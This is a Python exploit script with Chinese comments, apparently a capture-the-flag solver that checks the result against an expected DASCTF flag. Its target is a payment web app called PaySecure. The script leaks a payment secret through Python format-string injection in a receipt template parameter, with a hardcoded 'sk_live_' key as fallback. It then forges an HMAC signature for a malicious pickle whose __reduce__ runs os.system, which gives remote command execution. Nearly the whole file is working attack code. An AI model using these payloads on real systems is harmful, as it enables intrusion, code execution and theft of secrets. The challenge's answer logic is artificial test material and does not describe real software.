#!/usr/bin/python
# -*- coding: utf-8 -*-
import re, sys, requests, pickle, base64, hmac, hashlib, time, json, urllib.parse

HOST, PORT, FLAG = sys.argv[1:4]
BASE_URL = f"http://{HOST}:{PORT}"

def register_user(session):
    """注册用户"""
    resp = session.post(f"{BASE_URL}/api/register", data={
        'username': 'testuser',
        'password': 'testpass123'
    })
    return resp.json()['status'] == 'success'

def get_payment_secret(session):
    """Step 1: 通过格式化字符串漏洞获取支付密钥"""
    # 尝试不同的payload绕过黑名单
    test_payloads = [
        "{payment_verify.__code__.co_consts}",  # 原始
        "{payment_verify.__code__}",  # 只获取code对象
        "{payment_verify}",  # 获取函数对象
    ]
    
    for payload in test_payloads:
        print(f"尝试payload: {payload}")
        resp = session.get(f"{BASE_URL}/api/generate_receipt?template={urllib.parse.quote(payload)}")
        
        if resp.json()['status'] == 'success':
            receipt = resp.json()['receipt']
            print(f"成功! 返回: {receipt}")
            
            # 尝试解析结果
            consts_str = receipt.replace('交易凭证：', '')
            
            # 方法1: 直接查找sk_live_
            match = re.search(r"sk_live_[a-zA-Z0-9]+", consts_str)
            if match:
                print(f"找到支付密钥: {match.group(0)}")
                return match.group(0)
            
            # 方法2: 尝试eval解析
            try:
                import ast
                result = ast.literal_eval(consts_str)
                if isinstance(result, tuple):
                    for item in result:
                        if isinstance(item, str) and item.startswith('sk_live_'):
                            print(f"找到支付密钥: {item}")
                            return item
            except:
                pass
    
    print("无法自动获取支付密钥，使用硬编码密钥")
    return 'sk_live_7x9y2z8w5v4r3q1p0o6n'

def generate_signature(data, secret):
    """生成HMAC-SHA256签名"""
    return hmac.new(secret.encode(), data.encode(), hashlib.sha256).hexdigest()

def create_pickle_payload(cmd):
    """创建符合格式的pickle payload"""
    class MaliciousPayload:
        def __reduce__(self):
            import os
            return (os.system, (cmd,))
    
    # 创建包含恶意对象的字典
    payload = {
        'amount': 100.0,
        'command': cmd,
        '__class__': MaliciousPayload()
    }
    
    return base64.b64encode(pickle.dumps(payload)).decode()

def exploit_pickle(session, payment_secret):
    """Step 3: 通过pickle反序列化执行RCE"""
    # 构造读取flag的命令
    cmd = "cat /var/log/payment_success.log"
    pickle_data = create_pickle_payload(cmd)
    
    # 生成签名
    signature = generate_signature(pickle_data, payment_secret)
    
    headers = {
        'Signature': signature,
        'Content-Type': 'text/plain'
    }
    
    print(f"发送pickle数据 (前100字符): {pickle_data[:100]}...")
    print(f"使用签名: {signature}")
    
    resp = session.post(f"{BASE_URL}/api/callback", data=pickle_data, headers=headers)
    
    if resp.status_code == 200:
        result = resp.json()
        if result['status'] == 'success':
            print(f"Step 3成功!")
            output = result.get('data', '')
            print(f"命令输出: {output}")
            
            # 查找flag
            flag_match = re.search(r'DASCTF\{.*?\}', output)
            if flag_match:
                return flag_match.group(0)
            
            # 如果没有直接输出，检查是否包含flag提示
            if 'FLAG:' in output or 'flag' in output.lower():
                # 提取可能的flag
                lines = output.split('\n')
                for line in lines:
                    if 'DASCTF{' in line:
                        match = re.search(r'DASCTF\{[^}]+\}', line)
                        if match:
                            return match.group(0)
        else:
            print(f"Step 3失败: {result.get('message', '未知错误')}")
    else:
        print(f"Step 3HTTP错误: {resp.status_code}")
    
    return None

def exp(host, port):
    session = requests.Session()
    
    print("=== PaySecure漏洞利用开始 ===")
    
    # 使用默认账号登录
    print("Step 0: 登录...")
    resp = session.post(f"{BASE_URL}/api/login", data={
        'username': 'user',
        'password': 'password123'
    })
    
    if resp.json()['status'] != 'success':
        print("登录失败，尝试注册")
        if not register_user(session):
            print("注册也失败")
            return None
    
    print("Step 0成功: 用户登录完成")
    
    # Step 1: 获取支付密钥
    print("\nStep 1: 尝试获取支付密钥...")
    payment_secret = get_payment_secret(session)
    print(f"使用的支付密钥: {payment_secret}")
    
    # Step 3: Pickle反序列化RCE
    print("\nStep 3: 尝试pickle反序列化RCE...")
    flag = exploit_pickle(session, payment_secret)
    
    return flag

if __name__ == '__main__':
    if len(sys.argv) != 4:
        print(f"用法: {sys.argv[0]} <host> <port> <expected_flag>")
        sys.exit(1)
    
    flag = exp(HOST, PORT)
    
    if flag:
        print(f"\n获取到的flag: {flag}")
        if flag == FLAG:
            print("Pass!")
        else:
            print(f"Flag不匹配! 期望: {FLAG}, 实际: {flag}")
    else:
        print("\nExploit失败!")
        sys.exit(1)